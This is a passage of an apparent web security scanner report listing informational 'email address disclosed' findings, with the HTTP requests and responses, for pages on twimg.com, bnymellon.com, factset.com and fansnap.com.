...[SNIP]...

23.37. http://widgets.twimg.com/j/2/widget-2.2.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.twimg.com
Path:	/j/2/widget-2.2.css

Issue detail

The following email address was disclosed in the response:

dustin@twitter.com

Request

GET /j/2/widget-2.2.css HTTP/1.1
Host: widgets.twimg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links

Response

HTTP/1.0 200 OK
x-amz-id-2: Oc8sZgrPzG1Ge91qs+bSk2Jp3r2zfR+KY6uUoVnXknsTvYtt49MXb8XnQcLOFXDr
x-amz-request-id: 406E8208EC0284F9
Date: Wed, 01 Jun 2011 17:11:16 GMT
Expires: Sat, 27 Feb 2021 01:15:01 GMT+00:00
Last-Modified: Wed, 02 Mar 2011 01:15:11 GMT
ETag: "dafcd64c6e60c0cd55c5215a9899fc6d"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3574
Server: AmazonS3
Age: 4159986
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 7ae63c28b259b42f9220b179df00e9a04efa2389f527fe139f7e4797038bc9c2d9ea1be0b1cc4663
Via: 1.0 9ea7052caff424a8349b197d9240c64b.cloudfront.net:11180 (CloudFront), 1.0 26c110707e0d37c20949c3dad8cf524f.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://www.twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.2 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
*/
.twtr-widget{position:relative;font-size:12px!important;font-family:"lucida grande",lucida,tahoma,helvetica,ar
...[SNIP]...

23.38. http://www.bnymellon.com/foresight/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bnymellon.com
Path:	/foresight/index.html

Issue detail

The following email addresses were disclosed in the response:

ForeSight@bnymellon.com
foresight@bnymellon.com

Request

GET /foresight/index.html HTTP/1.1
Host: www.bnymellon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; WT_FPC=id=173.193.214.243-1841440192.30164523:lv=1311090569909:ss=1311090569909

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:49:27 GMT
Content-type: text/html
Connection: close

<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns ="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:foresight@bnymellon.com" class="noline">ForeSight@bnymellon.com</a>
...[SNIP]...

23.39. http://www.bnymellon.com/foresight/richardhoey.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bnymellon.com
Path:	/foresight/richardhoey.html

Issue detail

The following email addresses were disclosed in the response:

ForeSight@bnymellon.com
foresight@bnymellon.com

Request

GET /foresight/richardhoey.html HTTP/1.1
Host: www.bnymellon.com
Proxy-Connection: keep-alive
Referer: http://www.bnymellon.com/foresight/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; cookies=true; bnymcountry=0%21usen; WT_FPC=id=173.193.214.243-1841440192.30164523:lv=1311090588078:ss=1311090569909

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:49:52 GMT
Content-type: text/html
Connection: close

<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns ="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:foresight@bnymellon.com" class="noline">ForeSight@bnymellon.com</a>
...[SNIP]...

23.40. http://www.bnymellon.com/wealthmanagement/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bnymellon.com
Path:	/wealthmanagement/index.html

Issue detail

The following email address was disclosed in the response:

wealthmanagement@bnymellon.com

Request

GET /wealthmanagement/index.html HTTP/1.1
Host: www.bnymellon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; bnymcountry=0%21usen; WT_FPC=id=173.193.214.243-1841440192.30164523:lv=1311090580076:ss=1311090569909

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:49:35 GMT
Content-type: text/html
Connection: close

<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns ="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="/util/tosecure.cfm?Dest=/contact/index.cfm?id=wm">wealthmanagement@bnymellon.com<\/a>
...[SNIP]...
<a href="/util/tosecure.cfm?Dest=/contact/index.cfm?id=wm">wealthmanagement@bnymellon.com<\/a>
...[SNIP]...
<a href="/util/tosecure.cfm?Dest=/contact/index.cfm">wealthmanagement@bnymellon.com</a>
...[SNIP]...

23.41. http://www.factset.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/

Issue detail

The following email address was disclosed in the response:

support@factset.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:23 GMT
Content-Length: 66655
Content-Language: en
Expires: Sat, 21 Jul 2001 14:13:03 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Tue, 28 Jun 2011 18:55:42 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Age: 800
Connection: close

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.42. http://www.factset.com/events previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/events

Issue detail

The following email address was disclosed in the response:

support@factset.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:29:26 GMT
Content-Length: 76544
Content-Language: en
Expires: Sat, 21 Jul 2001 14:29:25 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Thu, 16 Jun 2011 15:28:57 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Connection: close

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.43. http://www.factset.com/files/jquery/nifty/niftycube.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/files/jquery/nifty/niftycube.js

Issue detail

The following email address was disclosed in the response:

a.fulciniti@html.it

Request

GET /files/jquery/nifty/niftycube.js HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:25 GMT
Server: Apache
Last-Modified: Thu, 27 Apr 2006 13:04:30 GMT
ETag: "14906-22c3-412693a8c9380"
Accept-Ranges: bytes
Content-Length: 8899
Connection: close
Content-Type: application/x-javascript

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the Li
...[SNIP]...

23.44. http://www.factset.com/images/searchInputBg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/images/searchInputBg.gif

Issue detail

The following email address was disclosed in the response:

support@factset.com

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 14:26:29 GMT
Bobo-Exception-Line: 646
Content-Length: 57208
Bobo-Exception-Value: See the server error log for details
Content-Language: en
Bobo-Exception-File: HTTPResponse.py
Bobo-Exception-Type: NotFound
Vary: Accept-Encoding
X-Cache-Rules-Applied: yes
Content-Type: text/html;charset=utf-8
Connection: close

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.45. http://www.factset.com/products/im previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/products/im

Issue detail

The following email address was disclosed in the response:

support@factset.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:33 GMT
Content-Length: 76057
Content-Language: en
Expires: Sat, 21 Jul 2001 14:00:36 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Wed, 08 Jun 2011 18:33:34 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Age: 1557
Connection: close

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.46. http://www.factset.com/products/im/img/im/title_1_2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/products/im/img/im/title_1_2.png

Issue detail

The following email address was disclosed in the response:

support@factset.com

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 14:26:36 GMT
Bobo-Exception-Line: 646
Content-Length: 61418
Bobo-Exception-Value: See the server error log for details
Content-Language: en
Bobo-Exception-File: HTTPResponse.py
Bobo-Exception-Type: NotFound
Vary: Accept-Encoding
X-Cache-Rules-Applied: yes
Content-Type: text/html;charset=utf-8
Connection: close

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.47. http://www.factset.com/products/privateequity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.factset.com
Path:	/products/privateequity

Issue detail

The following email address was disclosed in the response:

support@factset.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:48 GMT
Content-Length: 71606
Content-Language: en
Expires: Sat, 21 Jul 2001 14:26:47 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Thu, 23 Jun 2011 17:38:48 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Connection: close

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
nction(){$(this).html(supportPhone)})});$(document).ready(function(){$(".phone").each(function(){$(this).html(supportPhone)})})}
SupportNumberDataArray.push(new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com"));defaultSupportNumber=new SupportNumber("US,CA","+1.877.FACTSET","support@factset.com");SupportNumberDataArray.push(new SupportNumber("GB","0800.169.5954","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AU","1800.33.28.33","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BE","080094108","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("BR","0800 8917850","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DK","8060 1698","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("FR","0800.484.414","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("DE","0800.200.0320","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("HK","3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IN","000.800.440.1703","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IT","800.510.858","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("JP","0120.779.465","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("MX","+1.888.542.9899","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SY,LB,PS,JO,IQ,IR,SA,KW,BH,QA,AE,OM,YE,EG","+44.(0)20.7374.4445","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NL","0800.228.8024","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("NO","800.30365","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("IE","1800.409.937","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SG","800.61.61.724","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ES","900.811.921","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("ZA","0800 166 509","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("KR","080.411.0880","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("SE","0200.110.263","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CH","0800.881.720","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AE","80004440014","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("CN,IN,MY,LK,TW","+852.3011.4888","support@factset.com"));SupportNumberDataArray.push(new SupportNumber("AT,BG,CY,CZ,DK,EE,FI,GR,HU,IS,LV,LT,LU,MT,PL,PT,RO,SK,SI,RU,TR,HR,BA,GE,AM,MK,MONTENEGRO,CS","+44.(0)20.7374.4445","support@factset.com"));

/* - promoItems_var.js - */
// http://www.factset.com/portal_javascripts/promoItems_var.js?original=1
var promoImages=new Array();var HomePagePromoArray=new Array();
function HomePagePromo(title,
...[SNIP]...

23.48. http://www.fansnap.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fansnap.com
Path:	/

Issue detail

The following email address was disclosed in the response:

you@example.com

Request

Response

23.49. http://www.fansnap.com/developers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fansnap.com
Path:	/developers

Issue detail

The following email addresses were disclosed in the response:

developers@fansnap.com
you@example.com

Request

Response

